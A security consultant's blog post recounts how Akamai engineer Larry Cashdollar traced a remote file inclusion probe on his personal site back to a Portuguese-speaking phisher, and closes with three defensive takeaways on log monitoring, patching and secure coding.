RFI Vulnerability Lesson: Beware of Who You (try to) Hack

Isn’t it rewarding when a fellow security professional posts about an attempted hack of his personal website that he turned into a lesson in website security? And in the end, hacked the hacker? That’s exactly what happened with Larry Cashdollar, a senior security response engineer at Akamai. Cashdollar noticed something peculiar in the logs on his personal website. He dug further and turned up signs of someone scanning for remote file inclusion (RFI) vulnerabilities.

Before diving into the details, if you’re not sure what an RFI vulnerability is, definitely ask your web development and website management team if they’re aware of this type of vulnerability.  And if they don’t know, they need to do some research to prevent hacking attacks on your websites.  You can satisfy your curiosity – and share with your web team – this link to more information about it.

On to the Hacking Attempt

Larry Cashdollar told The Register his site’s logs showed that a  would-be attacker was probing for RFI holes to trick web applications into running a remote malicious script.  The hacker was trying to load a file using a custom tool that Cashdollar had created (!).

The hacker test was a generic test used against websites where they can figure out the input, supply a web address and see if they can execute on the input.  Unfortunately for the attacker, Cashdollar used the tool’s logs to trace back to the file that the attacker was trying to load. Then Cashdollar assessed that and other files the hacker had ready to execute to take over vulnerable websites, and was able to extract the criminal’s email address and their preferred language – Portuguese.

What was the purposes of the RFI vulnerability probe? The attacker wanted to install phishing pages that masqueraded as a legitimate bank’s login webpage, and then direct victims to the hacker’s page to collect bank account credentials.  This was a way around installing more sophisticated code to capture cryptocurrency.  It was just a matter of redirecting someone to a malicious site because the initial fake webpage looked legitimate.

3 Big Takeaways from the RFI Vulnerability Probe

Score one for the good guys! In this case the security professional caught and tracked down the attacker.  Now we need to take it as an alert to professionals who’re responsible for monitoring website security.  From Cashdollar’s account of the incident, the big takeaways for website administrators are the importance of:

  1. Diligently monitoring the audit logs
  2. Following a solid patching program for site management tools
  3. Writing web code that cannot be exploited for RFI and other known vulnerabilities.

If your website developers and administrators don’t know and don’t watch, you may not be as lucky as Cashdollar.

Chris Apgar, CISSP, CEO and president of Apgar & Associates, LLC is a nationally recognized expert and educational instructor on information security, privacy, HIPAA, the HITECH Act, state privacy law and electronic health information exchange.  A nationally known speaker and author, Chris authored the McGraw-Hill Healthcare Information Technology Exam Guide chapter on the regulatory aspects of health IT.